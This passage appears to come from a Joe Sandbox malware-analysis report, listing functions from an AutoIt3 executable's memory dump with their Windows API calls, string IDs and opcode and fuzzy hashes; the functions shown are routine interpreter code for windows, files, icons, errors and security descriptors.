                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                      • API String ID: 3730832054-3931177956
                                      • Opcode ID: ca9bb85bde45a91c06aef159f01f050fb88739106d0f64ad04587a51717c0bf8
                                      • Instruction ID: f5a375e87eeabc63632de3bbc2fe3ab7817b4ad7b177d08ff9328f1f682804fb
                                      • Opcode Fuzzy Hash: ca9bb85bde45a91c06aef159f01f050fb88739106d0f64ad04587a51717c0bf8
                                      • Instruction Fuzzy Hash: EFD1E071604619EBDB209F65D998B6EB7B4FF04B04F268255E409EB381DF70EC40DBA2
                                      Function 008849CF Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 00884A61
                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00884AAC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: BuffCharMessageSendUpper
                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                      • API String ID: 3974292440-4258414348
                                      • Opcode ID: d1742b3db654914b24858938bcc0a20529e1bbcbd522040ff5ff5e81fe8abeb9
                                      • Instruction ID: 22891b94288b23f46d24359c3a7f23363e4edee2fc15324a8a2262a064e06d21
                                      • Opcode Fuzzy Hash: d1742b3db654914b24858938bcc0a20529e1bbcbd522040ff5ff5e81fe8abeb9
                                      • Instruction Fuzzy Hash: C6918C712007129FCB04EF68C851A69B7A5FF94354F109958FD96DB3A2CB31ED49CB82
                                      Function 0088BE70 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0088BF26
                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00887136,?), ref: 0088BF82
                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0088BFBB
                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0088BFFE
                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0088C035
                                      • FreeLibrary.KERNEL32(?), ref: 0088C041
                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0088C051
                                      • DestroyIcon.USER32(?), ref: 0088C060
                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0088C07D
                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0088C089
                                        • Part of subcall function 0082312D: __wcsicmp_l.LIBCMT ref: 008231B6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                      • String ID: .dll$.exe$.icl
                                      • API String ID: 1212759294-1154884017
                                      • Opcode ID: 1b0fabcd52af4298d2345132822ad57348c07a53b262f43995ca3eb04ea59a84
                                      • Instruction ID: 49d89a87d8f2b6c55c401249796d3d5db71adc79bb394686566fc76841e96147
                                      • Opcode Fuzzy Hash: 1b0fabcd52af4298d2345132822ad57348c07a53b262f43995ca3eb04ea59a84
                                      • Instruction Fuzzy Hash: 3261E0B1540619FEEB14EFA8DC41BBE77A8FF08760F10420AF915D61C1DB75AA90DBA0
                                      Function 0086E25D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLocalTime.KERNEL32(?), ref: 0086E31F
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 0086E32F
                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0086E33B
                                      • __wsplitpath.LIBCMT ref: 0086E399
                                      • _wcscat.LIBCMT ref: 0086E3B1
                                      • _wcscat.LIBCMT ref: 0086E3C3
                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0086E3D8
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0086E3EC
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0086E41E
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0086E43F
                                      • _wcscpy.LIBCMT ref: 0086E44B
                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0086E48A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                      • String ID: *.*
                                      • API String ID: 3566783562-438819550
                                      • Opcode ID: daece05ece4c825cb57aa0f3ecdec95aed39243e4482f5888fda38b26cc1f28a
                                      • Instruction ID: d9590f9dfb8d95bb4546835ccb97a394e3476c5f36922b246e0191b23e623de3
                                      • Opcode Fuzzy Hash: daece05ece4c825cb57aa0f3ecdec95aed39243e4482f5888fda38b26cc1f28a
                                      • Instruction Fuzzy Hash: B26156B6504605AFC710EF64D845A9FB3E8FF88310F05891EF989C7251EB35E945CBA2
                                      Function 0086A27B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0086A2C2
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0086A2E3
                                      • __swprintf.LIBCMT ref: 0086A33C
                                      • __swprintf.LIBCMT ref: 0086A355
                                      • _wprintf.LIBCMT ref: 0086A3FC
                                      • _wprintf.LIBCMT ref: 0086A41A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: LoadString__swprintf_wprintf$_memmove
                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                      • API String ID: 311963372-3080491070
                                      • Opcode ID: 7fe0ce4906c9fdb5562cf0024845dd7675ca05c5acffff040301790e84b412eb
                                      • Instruction ID: abebec49f8ba437bc16d6425e5c298c8d9c8683d2879c6cc63a539d0696d5518
                                      • Opcode Fuzzy Hash: 7fe0ce4906c9fdb5562cf0024845dd7675ca05c5acffff040301790e84b412eb
                                      • Instruction Fuzzy Hash: 35516971900219AACF19EBA4CD5AEEEB779FF04340F100165B515F2292EB752E98CA52
                                      Function 00860065 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,0084F8B8,00000001,0000138C,00000001,00000000,00000001,?,00873FF9,00000000), ref: 0086009A
                                      • LoadStringW.USER32(00000000,?,0084F8B8,00000001), ref: 008600A3
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                      • GetModuleHandleW.KERNEL32(00000000,008C7310,?,00000FFF,?,?,0084F8B8,00000001,0000138C,00000001,00000000,00000001,?,00873FF9,00000000,00000001), ref: 008600C5
                                      • LoadStringW.USER32(00000000,?,0084F8B8,00000001), ref: 008600C8
                                      • __swprintf.LIBCMT ref: 00860118
                                      • __swprintf.LIBCMT ref: 00860129
                                      • _wprintf.LIBCMT ref: 008601D2
                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 008601E9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                      • API String ID: 984253442-2268648507
                                      • Opcode ID: 050c0cb21bba6b93b37196265ab199c16b50416998aa7d37416ed2a85fa98119
                                      • Instruction ID: 88b70e024b3531c9fed72df101256902c42333b0aa794704f8e44f07ad39dca6
                                      • Opcode Fuzzy Hash: 050c0cb21bba6b93b37196265ab199c16b50416998aa7d37416ed2a85fa98119
                                      • Instruction Fuzzy Hash: 52414F72940119AACF15EBD4DD9ADEEB77CFF14340F500165F605E2192DA346F88CBA2
                                      Function 0086A995 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00804D37: __itow.LIBCMT ref: 00804D62
                                        • Part of subcall function 00804D37: __swprintf.LIBCMT ref: 00804DAC
                                      • CharLowerBuffW.USER32(?,?), ref: 0086AA0E
                                      • GetDriveTypeW.KERNEL32 ref: 0086AA5B
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0086AAA3
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0086AADA
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0086AB08
                                        • Part of subcall function 00811821: _memmove.LIBCMT ref: 0081185B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                      • API String ID: 2698844021-4113822522
                                      • Opcode ID: b8ddd4091cc3de4e612b1a4e9f55217bedb9fa9386293e2269175e78be408e3a
                                      • Instruction ID: 717f977d05ec73c28032be505bf0ea5cd41e6bc15fd73472212545d3defd87c1
                                      • Opcode Fuzzy Hash: b8ddd4091cc3de4e612b1a4e9f55217bedb9fa9386293e2269175e78be408e3a
                                      • Instruction Fuzzy Hash: D75159B11042059FC704EF54C8819AAB7E8FF98758F10892DF995E73A1DB31AE49CF92
                                      Function 0086A832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0086A852
                                      • __swprintf.LIBCMT ref: 0086A874
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0086A8B1
                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0086A8D6
                                      • _memset.LIBCMT ref: 0086A8F5
                                      • _wcsncpy.LIBCMT ref: 0086A931
                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0086A966
                                      • CloseHandle.KERNEL32(00000000), ref: 0086A971
                                      • RemoveDirectoryW.KERNEL32(?), ref: 0086A97A
                                      • CloseHandle.KERNEL32(00000000), ref: 0086A984
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                      • String ID: :$\$\??\%s
                                      • API String ID: 2733774712-3457252023
                                      • Opcode ID: 52279c8663d7b3ff32c228d8c88c801383258acbddaed2d9714c36ff9b766f92
                                      • Instruction ID: 49a17ff0dba9e2377ccbdaa3f6b88d65e724dd3cff81c503765496b102ca8ee3
                                      • Opcode Fuzzy Hash: 52279c8663d7b3ff32c228d8c88c801383258acbddaed2d9714c36ff9b766f92
                                      • Instruction Fuzzy Hash: D531D27290011AABDB219FA4DC49FEB77BCFF88700F1541B6FA18E6160E77096848F25
                                      Function 0083AAFB Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                      • String ID:
                                      • API String ID: 884005220-0
                                      • Opcode ID: 4f43c563de1facc822cf5b77f62d2072e8e9806a2d91a8ab7e8d4ce46cd8bdc6
                                      • Instruction ID: 72e61ed82ceb46ae614841b3d3889235c2313bcd6936df428785358df42fb514
                                      • Opcode Fuzzy Hash: 4f43c563de1facc822cf5b77f62d2072e8e9806a2d91a8ab7e8d4ce46cd8bdc6
                                      • Instruction Fuzzy Hash: C3610672901215EFEB295F28EC41B69B7A9FF91331F14411AE881EB1D1DB78D8818BD3
                                      Function 0088C0A5 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0088C0C8
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0088C0DF
                                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0088C0EA
                                      • CloseHandle.KERNEL32(00000000), ref: 0088C0F7
                                      • GlobalLock.KERNEL32(00000000), ref: 0088C100
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0088C10F
                                      • GlobalUnlock.KERNEL32(00000000), ref: 0088C118
                                      • CloseHandle.KERNEL32(00000000), ref: 0088C11F
                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0088C130
                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00893C7C,?), ref: 0088C149
                                      • GlobalFree.KERNEL32(00000000), ref: 0088C159
                                      • GetObjectW.GDI32(?,00000018,000000FF), ref: 0088C17D
                                      • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0088C1A8
                                      • DeleteObject.GDI32(00000000), ref: 0088C1D0
                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0088C1E6
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                      • String ID:
                                      • API String ID: 3840717409-0
                                      • Opcode ID: dc3a0b4c886dd49bde3a873db55108de8815e834e869d33e95027d4ee53b2e0f
                                      • Instruction ID: ce4d3c38304ad081aa86cd377272c311214e1c54e7b65ab8d1ee782fcd52a861
                                      • Opcode Fuzzy Hash: dc3a0b4c886dd49bde3a873db55108de8815e834e869d33e95027d4ee53b2e0f
                                      • Instruction Fuzzy Hash: C4411875600208AFDB21AFA5DC8CEAA7BB8FF89711F144159F90AE7261D7309941DF60
                                      Function 0086DEDC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                      Download Yara Rule
                                      APIs
                                      • __wsplitpath.LIBCMT ref: 0086E053
                                      • _wcscat.LIBCMT ref: 0086E06B
                                      • _wcscat.LIBCMT ref: 0086E07D
                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0086E092
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0086E0A6
                                      • GetFileAttributesW.KERNEL32(?), ref: 0086E0BE
                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 0086E0D8
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0086E0EA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                      • String ID: *.*
                                      • API String ID: 34673085-438819550
                                      • Opcode ID: e6a7de04cfda30abeda00fb7bff4c8a11ec607dce5417d0820ffceb0a8fabd9d
                                      • Instruction ID: 27de06c46bf91712a7dfeebb9ce867e893f6d347cfe5d1c88930e81021ed4cb4
                                      • Opcode Fuzzy Hash: e6a7de04cfda30abeda00fb7bff4c8a11ec607dce5417d0820ffceb0a8fabd9d
                                      • Instruction Fuzzy Hash: 2A818271A043459FCB64EF68C84496AB7E8FF99314F19882EF886C7251EF30D945CB52
                                      Function 0088C854 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008029E2: GetWindowLongW.USER32(?,000000EB), ref: 008029F3
                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0088C8A4
                                      • GetFocus.USER32 ref: 0088C8B4
                                      • GetDlgCtrlID.USER32(00000000), ref: 0088C8BF
                                      • _memset.LIBCMT ref: 0088C9EA
                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0088CA15
                                      • GetMenuItemCount.USER32(?), ref: 0088CA35
                                      • GetMenuItemID.USER32(?,00000000), ref: 0088CA48
                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0088CA7C
                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0088CAC4
                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0088CAFC
                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0088CB31
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                      • String ID: 0
                                      • API String ID: 1296962147-4108050209
                                      • Opcode ID: dd44220e8723245a6c657225f0778402b4d8bffe42d7ba1060c730df1a926d04
                                      • Instruction ID: f74a07015e2b46792f96a0eef390abfdaab69fe20fd3050ce2d93a6e64f0014c
                                      • Opcode Fuzzy Hash: dd44220e8723245a6c657225f0778402b4d8bffe42d7ba1060c730df1a926d04
                                      • Instruction Fuzzy Hash: EA815771208315AFD714EF24C985A6ABBE8FF88314F04496EF995E3291D730D905CFA2
                                      Function 00858ACA Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00858E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00858E3C
                                        • Part of subcall function 00858E20: GetLastError.KERNEL32(?,00858900,?,?,?), ref: 00858E46
                                        • Part of subcall function 00858E20: GetProcessHeap.KERNEL32(00000008,?,?,00858900,?,?,?), ref: 00858E55
                                        • Part of subcall function 00858E20: HeapAlloc.KERNEL32(00000000,?,00858900,?,?,?), ref: 00858E5C
                                        • Part of subcall function 00858E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00858E73
                                        • Part of subcall function 00858EBD: GetProcessHeap.KERNEL32(00000008,00858916,00000000,00000000,?,00858916,?), ref: 00858EC9
                                        • Part of subcall function 00858EBD: HeapAlloc.KERNEL32(00000000,?,00858916,?), ref: 00858ED0
                                        • Part of subcall function 00858EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00858916,?), ref: 00858EE1
                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00858B2E
                                      • _memset.LIBCMT ref: 00858B43
                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00858B62
                                      • GetLengthSid.ADVAPI32(?), ref: 00858B73
                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00858BB0
                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00858BCC
                                      • GetLengthSid.ADVAPI32(?), ref: 00858BE9
                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00858BF8
                                      • HeapAlloc.KERNEL32(00000000), ref: 00858BFF
                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00858C20
                                      • CopySid.ADVAPI32(00000000), ref: 00858C27
                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00858C58
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00858C7E
                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00858C92
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                      • String ID:
                                      • API String ID: 3996160137-0
                                      • Opcode ID: 8dfd8998d00b4ab3a7ba6f111dc3aa9bd52fa345f2ccc30a816bd96f55ea86b7
                                      • Instruction ID: e80e123a3a53630d2c5e5cf0892db5a22cc0e838eac990674c85d62c97e0c102
                                      • Opcode Fuzzy Hash: 8dfd8998d00b4ab3a7ba6f111dc3aa9bd52fa345f2ccc30a816bd96f55ea86b7
                                      • Instruction Fuzzy Hash: 42615771900209EFDF109FA4DC45EAEBBB9FF05301F08816AE915E7290DB359A09CF60
                                      Function 00877A04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(00000000), ref: 00877A79
                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00877A85
